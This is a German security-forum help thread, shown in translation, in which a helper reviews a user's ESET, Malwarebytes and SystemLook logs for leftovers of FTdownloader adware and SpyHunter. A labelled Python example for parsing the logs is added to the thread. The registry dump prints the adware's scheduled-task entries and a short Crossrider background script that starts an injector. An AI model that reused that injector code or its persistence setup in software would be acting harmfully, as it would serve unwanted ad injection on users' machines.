Trojaner-Board

SpyHunter4 as PC scanner... (https://www.trojaner-board.de/139699-spyhunter4-pc-scanner.html)

Minter 13.08.2013 08:35

Code:

ESETSmartInstaller@High as downloader log:
all ok
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=323582ef8fe5a842a20b36033251bb5e
# engine=14752
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=false
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2013-08-13 06:21:36
# local_time=2013-08-13 08:21:36 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode=5122 16777213 100 90 2493439 125161092 0 0
# compatibility_mode=5893 16776573 100 94 3003334 128004746 0 0
# scanned=191261
# found=0
# cleaned=0
# scan_time=8465

Is that the right log?

cosinus 13.08.2013 08:47

Yes. The Malwarebytes log is missing.

Minter 13.08.2013 09:10

Code:

Malwarebytes Anti-Malware (Test) 1.75.0.1300
www.malwarebytes.org

Datenbank Version: v2013.08.12.07

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 10.0.9200.16540
Moritz :: MORITZ-PC [Administrator]

Schutz: Aktiviert

13.08.2013 10:06:40
mbam-log-2013-08-13 (10-06-40).txt

Art des Suchlaufs: Quick-Scan
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 240837
Laufzeit: 3 Minute(n), 2 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 0
(Keine bösartigen Objekte gefunden)

(Ende)


cosinus 13.08.2013 09:14

Looks OK so far.

Regarding cookies and other things on the web: to block this plague from the outset (i.e. tracking cookies, ad banners, etc.), you should take a look at something like the MVPS Hosts File => Blocking Unwanted Parasites with a Hosts File. It makes sense to check MVPS every 4 weeks to see whether he has released a new hosts file.

Info: Cookies are not malware as such, but there is a risk of misuse (unique re-identification, e.g. for targeted advertising or similar => HTTP cookie).

Otherwise there are also good cookie managers; for Firefox, for example, there is the CookieCuller extension.
But if you can live with logging in again everywhere in every browser session (e.g. Facebook, Ebay, GMX, or Trojaner-Board), then simply set the browser to delete everything, including cookies, when the browser is closed.

Is your system back in order now, or are there still other findings or problems?

Minter 13.08.2013 09:33

Well, under C:\ Programme (x86) I found a folder named: FTdownloader V4.0. As already mentioned, I once had (or still have) the ftdownloader on my computer. I assume that this is the same as before. Do I need to worry about that now? And if so, how do I get rid of it? Just delete it?
And SpyHunter is still on the desktop.

cosinus 13.08.2013 09:37

Scan with SystemLook (x64)

Download SystemLook by jpshortstuff from one of the following mirrors and save the tool to the desktop.
SystemLook (64 bit)
  • Double-click SystemLook_x64.exe to start the tool.
  • Copy the contents of the following code box into the tool's text field:
    Code:

    :filefind
    *FTdownloader*
    *Spyhunter*

    :folderfind
    *FTdownloader*
    *Spyhunter*

    :regfind
    FTdownloader
    Spyhunter

  • Now click the Look button to start the scan.
  • The scan may take some time.
  • When the scan has finished, your editor will open with the results; post them in your thread.
  • The results are saved on the desktop as SystemLook.txt.
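
Added example, not part of the original thread and not SystemLook's own code: a Python triage of the `:filefind` section of the SystemLook.txt that this scan writes. It separates scheduled-task files (persistence entries that deleting the program folder alone leaves behind) from binaries, shortcuts and Prefetch traces, and groups files with identical MD5s. The line layout is an assumption taken from SystemLook's text output; the sample log, the `ExampleBar` name and all hashes are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

TS = "%H:%M %d/%m/%Y"  # SystemLook timestamp layout, e.g. [12:16 26/07/2013]
SECTION = re.compile(r"^=+ (\w+) =+$")
SEARCH = re.compile(r'^Searching for "(.*)"$')
# One file hit: path, 7 attribute flags, size, created, modified, MD5.
FILE_LINE = re.compile(
    r"^(?P<path>.+?)\s+(?P<attrs>[-a-z]{7})\s+(?P<size>\d+) bytes\s+"
    r"\[(?P<created>[^\]]+)\]\s+\[(?P<modified>[^\]]+)\]\s+(?P<md5>[0-9A-Fa-f]{32})$"
)

# Constructed sample input (hypothetical program name, placeholder hashes).
SAMPLE_LOG = r"""
========== filefind ==========

Searching for "*ExampleBar*"
C:\Program Files (x86)\ExampleBar\ExampleBar-helper.exe        --a---- 311808 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 0123456789ABCDEF0123456789ABCDEF
C:\Windows\System32\Tasks\ExampleBar-updater        --a---- 4262 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 11111111111111111111111111111111
C:\Windows\Tasks\ExampleBar-updater.job        --a---- 1232 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] 22222222222222222222222222222222
C:\Users\Test\Downloads\ExampleBar-Setup.exe        --a---- 726464 bytes        [08:25 26/07/2013]        [08:25 26/07/2013] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
C:\Users\Test\Downloads\ExampleBar-Setup(1).exe        --a---- 726464 bytes        [08:31 26/07/2013]        [08:31 26/07/2013] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
C:\Windows\Prefetch\EXAMPLEBAR-HELPER.EXE-0A1B2C3D.pf        --a---- 165806 bytes        [12:20 26/07/2013]        [07:30 13/08/2013] 33333333333333333333333333333333
C:\Users\Test\Desktop\ExampleBar.lnk        --a---- 2218 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 44444444444444444444444444444444

========== folderfind ==========

Searching for "*ExampleBar*"
C:\Program Files (x86)\ExampleBar        d------        [12:15 26/07/2013]
"""


def classify(path):
    """Map a hit to the kind of artifact it represents, by location first."""
    p = path.lower()
    if "\\windows\\system32\\tasks\\" in p or "\\windows\\tasks\\" in p:
        return "scheduled-task"      # persistence: runs without user action
    if "\\windows\\prefetch\\" in p and p.endswith(".pf"):
        return "execution-trace"     # evidence that the program has run
    if p.endswith(".lnk"):
        return "shortcut"
    if p.endswith((".exe", ".dll", ".sys")):
        return "binary"
    return "other"


def parse_filefind(text):
    """Return one dict per file hit in the ':filefind' section of the log."""
    entries, section, pattern = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        header = SECTION.match(line)
        if header:
            section, pattern = header.group(1), None
            continue
        search = SEARCH.match(line)
        if search:
            pattern = search.group(1)
            continue
        hit = FILE_LINE.match(line) if section == "filefind" else None
        if hit:
            entries.append({
                "pattern": pattern,
                "path": hit.group("path"),
                "size": int(hit.group("size")),
                "created": datetime.strptime(hit.group("created"), TS),
                "modified": datetime.strptime(hit.group("modified"), TS),
                "md5": hit.group("md5").upper(),
                "category": classify(hit.group("path")),
            })
    return entries


def triage(entries):
    """Group hits by category and hash; record the earliest creation per search."""
    by_category, by_hash, first_seen = defaultdict(list), defaultdict(list), {}
    for e in entries:
        by_category[e["category"]].append(e["path"])
        by_hash[e["md5"]].append(e["path"])
        seen = first_seen.get(e["pattern"])
        if seen is None or e["created"] < seen:
            first_seen[e["pattern"]] = e["created"]
    duplicates = {h: p for h, p in by_hash.items() if len(p) > 1}
    return {"by_category": dict(by_category),
            "duplicates": duplicates,
            "first_seen": first_seen}


if __name__ == "__main__":
    report = triage(parse_filefind(SAMPLE_LOG))
    for category, paths in sorted(report["by_category"].items()):
        print(f"{category}: {len(paths)}")
        for path in paths:
            print(f"  {path}")
    for md5, paths in report["duplicates"].items():
        print(f"same content ({md5}): {paths}")
    for pattern, when in report["first_seen"].items():
        print(f"{pattern}: earliest file created {when:%d/%m/%Y %H:%M}")
```
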

Minter 13.08.2013 09:42

Code:

SystemLook 30.07.11 by jpshortstuff
Log created at 10:39 on 13/08/2013 by Moritz
Administrator - Elevation successful

========== filefind ==========

Searching for "*FTdownloader*"
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil.dll        --a---- 393216 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 079E87F2A760FC41C6A6767BCB87B5F2
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil.exe        --a---- 338432 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] BA25FC5D1BEDBE821F063D6956BEBA4D
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.dll        --a---- 473088 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] D2E25B7E08F1370BE1B649E96B33142F
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.exe        --a---- 442880 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 2185767A2A7BCA1CD4570E0DCF6F9350
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-helper.exe        --a---- 311808 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 033E5078BCE5B537286E8E256C91D434
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0.ico        --a---- 9662 bytes        [11:19 30/06/2013]        [11:19 30/06/2013] 0A8D41A2552E2FC0A5CCD4AEB106FBF2
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\FTdownloader V4.0.lnk        --a---- 726 bytes        [07:36 13/08/2013]        [07:36 13/08/2013] 790AACB9534E01ABB21F1480C6D9A1B8
C:\Windows\System32\Tasks\FTdownloader V4.0-codedownloader        --a---- 4256 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 77F95681B9972C1DDE808B209EAC739B
C:\Windows\System32\Tasks\FTdownloader V4.0-enabler        --a---- 4166 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 3C451D483016AB248AC0B8FBDB56E673
C:\Windows\System32\Tasks\FTdownloader V4.0-updater        --a---- 4262 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] A5216EE89CA0126CFBA1044B683DE65E
C:\Windows\Tasks\FTdownloader V4.0-codedownloader.job        --a---- 1226 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] 3FB5E9A85AA0F499D86530241DACB64B
C:\Windows\Tasks\FTdownloader V4.0-enabler.job        --a---- 1136 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] FF2CF9A43027FE63CBF838105BF502B4
C:\Windows\Tasks\FTdownloader V4.0-updater.job        --a---- 1232 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] F62D368B093CC484B99E203338E25C37

Searching for "*Spyhunter*"
C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe        --a---- 7529344 bytes        [21:46 27/06/2013]        [21:46 27/06/2013] 64F7854468F5D54389D9E0500FD47FE8
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_191644.log        --a---- 64781 bytes        [17:16 11/08/2013]        [17:16 11/08/2013] 4AF03E4352D537823CA8F755E055A4C8
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_193743.log        --a---- 124907 bytes        [17:37 11/08/2013]        [18:46 11/08/2013] 90D16F35B0521DE18E8EB3385E20C39A
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_204654.log        --a---- 69511 bytes        [18:46 11/08/2013]        [18:49 11/08/2013] 43C73565F0B32BA34160D8B992742ABA
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_205012.log        --a---- 69511 bytes        [18:50 11/08/2013]        [19:06 11/08/2013] 693434F81C3E8E626A174F255379A5E4
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_210735.log        --a---- 122372 bytes        [19:07 11/08/2013]        [20:54 11/08/2013] 3F1C0E96D485B0059E71DC7536B93606
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_091522.log        --a---- 123665 bytes        [07:15 12/08/2013]        [07:47 12/08/2013] 3EF394D1CF6424373116E4B5828D329B
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_094843.log        --a---- 121749 bytes        [07:48 12/08/2013]        [08:29 12/08/2013] 6B4D540A516D2459989142FEB12D1C36
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_113256.log        --a---- 124488 bytes        [09:32 12/08/2013]        [12:04 12/08/2013] D74F81776EBAB6EA51825AF9C450C271
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_154235.log        --a---- 64781 bytes        [13:42 12/08/2013]        [13:42 12/08/2013] 6EA9F0164892524F8EDDFCE854A429F4
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_154539.log        --a---- 64781 bytes        [13:45 12/08/2013]        [13:45 12/08/2013] C4F99D3D094BCE3CA34F437DBAED5E32
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_154601.log        --a---- 64781 bytes        [13:46 12/08/2013]        [13:46 12/08/2013] 37956886F3A17C6969B78E750AFFF8C7
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_154900.log        --a---- 70451 bytes        [13:49 12/08/2013]        [14:12 12/08/2013] 40D07F2B569EEE3B5C216CE968F30B2D
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_161543.log        --a---- 71659 bytes        [14:15 12/08/2013]        [15:09 12/08/2013] 38B208EFBC7B7C1FDE261AF114408962
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_171026.log        --a---- 64468 bytes        [15:10 12/08/2013]        [15:10 12/08/2013] A3E3269035435A4E024B338BC02E0CF3
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_181932.log        --a---- 69690 bytes        [16:19 12/08/2013]        [16:41 12/08/2013] 69F7C219CC65205A2FEAB591DFA3CB1B
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_213506.log        --a---- 70848 bytes        [19:35 12/08/2013]        [21:09 12/08/2013] 84C23063CDD28F4446302A186FD0EBB6
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130813_092707.log        --a---- 69556 bytes        [07:27 13/08/2013]        [07:27 13/08/2013] 144FEF3F2843E12EC24BA4575E7385CF
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\SpyHunter.lnk        --a---- 12130 bytes        [13:26 12/08/2013]        [13:26 12/08/2013] 7FB1162DAB9E2DA90C88CCECD0C87808
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\SpyHunter Emergency Startup.lnk        --a---- 1912 bytes        [08:42 27/07/2013]        [08:42 27/07/2013] 016E6144CB2740A114B29DF603AA053B
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\SpyHunter.lnk        --a---- 2254 bytes        [08:42 27/07/2013]        [08:42 27/07/2013] CC9E6FC3C818F1BD8DEDA8EFCFCBF153
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\Uninstall SpyHunter.lnk        --a---- 996 bytes        [08:42 27/07/2013]        [08:42 27/07/2013] 73D176BF77F99B33447A07B40601A0E8
C:\Users\Moritz\Desktop\SpyHunter.lnk        --a---- 2218 bytes        [08:42 27/07/2013]        [08:42 27/07/2013] 63289515C1643D0B1535387F7E1FEDF1
C:\Users\Moritz\Downloads\SpyHunter-Installer(1).exe        --a---- 726464 bytes        [08:31 27/07/2013]        [08:31 27/07/2013] EEA0B34B60632083F2A75352BAE365FB
C:\Users\Moritz\Downloads\SpyHunter-Installer.exe        --a---- 726464 bytes        [08:25 27/07/2013]        [08:25 27/07/2013] EEA0B34B60632083F2A75352BAE365FB
C:\Windows\Prefetch\SPYHUNTER4.EXE-5B920D84.pf        --a---- 165806 bytes        [17:24 27/07/2013]        [13:46 12/08/2013] 2F407C91D7454A65F9ED0F5947160ED8
C:\Windows\System32\Tasks\SpyHunter4Startup        --a---- 3332 bytes        [08:42 27/07/2013]        [08:42 27/07/2013] 1E01CD65C6C6A6EA6EF2B7AE37BB57E7

========== folderfind ==========

Searching for "*FTdownloader*"
C:\Program Files (x86)\FTdownloader V4.0        d------        [12:15 26/07/2013]
C:\Users\Moritz\AppData\Local\Cool_Mirage\FTDownloader.exe_Url_srel2ybtny14zdfla5iaze4jen4lh3ou        d------        [12:15 26/07/2013]

Searching for "*Spyhunter*"
C:\Program Files\Enigma Software Group\SpyHunter        d------        [08:42 27/07/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02        d----c-        [18:32 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b        d----c-        [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1        d----c-        [17:55 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981        d----c-        [17:54 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0        d----c-        [17:53 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35        d----c-        [17:17 11/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7        d----c-        [13:45 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e        d----c-        [13:43 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a        d----c-        [13:46 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876        d----c-        [15:10 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652        d----c-        [18:18 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6        d----c-        [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450        d----c-        [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02        d----c-        [18:32 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b        d----c-        [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1        d----c-        [17:55 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981        d----c-        [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0        d----c-        [17:53 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35        d----c-        [17:17 11/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7        d----c-        [13:45 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e        d----c-        [13:43 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a        d----c-        [13:46 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876        d----c-        [15:10 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652        d----c-        [18:18 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6        d----c-        [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450        d----c-        [17:54 07/08/2013]
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter        d------        [08:42 27/07/2013]

========== regfind ==========

Searching for "FTdownloader"
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Code]
"BgJavaScript"="

/************************************************************************************
  This is your background code.
  For more information please visit our wiki site:
  hxxp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/

appAPI.ready(function($) {
        var version="4.0";
        try { innergaq.init('UA-41261898-1', version , 'FTDownloader_V4.0');} catch (e) {};
        injectorBack.init("ftdown4", version, "htd");
});

"
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Db\Async-Local\js]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Manifest]
"Name"="FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
@="FTDownloader URI"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
"Content Type"="application/x-FTDownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader\DefaultIcon]
@="C:\Program Files (x86)\FTDownloader.com\FTDownloader.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader\shell\open\command]
@=""C:\Program Files (x86)\FTDownloader.com\FTDownloader.exe" /u="%1""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FTDownloader_RASAPI32]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FTDownloader_RASMANCS]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}]
"Path"="\FTdownloader V4.0-updater"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}]
"Path"="\FTdownloader V4.0-enabler"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}]
"Path"="\FTdownloader V4.0-codedownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\FTdownloader V4.0]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lgnbhdnimikkoodkogjlcllngimhlapp]
"path"="C:\Program Files (x86)\FTDownloader.com\FTDownloader10.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppName"="FTdownloader V4.0-buttonutil64.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppName"="FTdownloader V4.0-codedownloader.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppName"="FTdownloader V4.0-bg.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppName"="FTdownloader V4.0-buttonutil.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppName"="FTdownloader V4.0-helper.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0]
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Code]
"BgJavaScript"="

/************************************************************************************
  This is your background code.
  For more information please visit our wiki site:
  hxxp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/

appAPI.ready(function($) {
        var version="4.0";
        try { innergaq.init('UA-41261898-1', version , 'FTDownloader_V4.0');} catch (e) {};
        injectorBack.init("ftdown4", version, "htd");
});

"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Db\Async-Local\js]
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Manifest]
"Name"="FTdownloader V4.0"

Searching for "Spyhunter"
[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BFC3EA82B8755F47AEB16F8FC4FA330]
"ProductName"="SpyHunter"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File8"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_LOCAL_MACHINE\SOFTWARE\EnigmaSoftwareGroup\SpyHunter]
[HKEY_LOCAL_MACHINE\SOFTWARE\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig]
[HKEY_LOCAL_MACHINE\SOFTWARE\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig]
"InstallLoc"="C:\Program Files\Enigma Software Group\SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\Defs\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\167ED423049710645A22436AA88D0A99]
